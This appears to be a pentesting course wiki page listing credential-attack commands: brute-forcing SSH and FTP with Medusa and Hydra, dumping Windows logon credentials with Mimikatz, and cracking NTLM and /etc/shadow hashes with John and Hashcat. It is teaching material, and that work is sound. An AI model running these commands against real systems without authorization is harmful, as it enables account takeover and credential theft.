Pentesting Tools: Credential Testing - Paiet/SEC-335 GitHub Wiki

Credential testing tools
- Medusa
  - Network remote access audit tool
  - Dump all medusa modules: medusa -d
  - Bruteforce SSH: medusa -h 10.0.0.165 -u msfadmin -P logins.txt -M ssh
- Hydra
  - Network remote access audit tool
  - Bruteforce FTP: hydra -L users.txt -P logins.txt 10.0.0.165 ftp
- Patator
  - The README is in the patator executable
    - less /usr/bin/patator
    - Bruteforce TELNET:
      - List modules : patator -h
      - Attack : Copy from...patator telnet_login -help
        
        Change necessary items
        
        Users = users.txt
        
        Passwords = logins.txt
- Cewl
  - Crawls websites for words to make custom password list
    - Rules are user defined
      - Define size of words to gather
      - cewl -o -m 6 10.0.0.21 -w wordlist.txt
Mimikatz
- Grabs NTLM password hashes from Windows systems
  - Run Mimikatz
  - privilege::debug
  - sekurlsa::logonpasswords
John the Ripper
- Windows
  1. john --format=NT --rules -w=/usr/share/wordlists/rockyou.txt hashfile.txt
  2. john --show hashfile.txt or john --format=NT --show hashfile.txt
  3. cat /home/user/.john/john.pot
- Unix/Linux
  1. john passwordz.txt
  2. john --show passwordz.txt
Hashcat
- Windows
  - hashcat -m 0 -a 0 mimidump.txt /usr/share/wordlists/rockyou.txt --force
- Unix/Linux
  1. Create a test user
  2. Grab pass from /etc/shadow
  3. Modify pass hash to remove superfluous data
  4. hashcat -m 1800 -a 0 nixPass.txt /usr/share/wordlists/rockyou.txt --force
  5. cat /root/.hashcat/hashcat.potfile
Cain and Abel
- Show cracking local NTLM for Admin
W3AF
- Basic HTTP Authentication bruteforce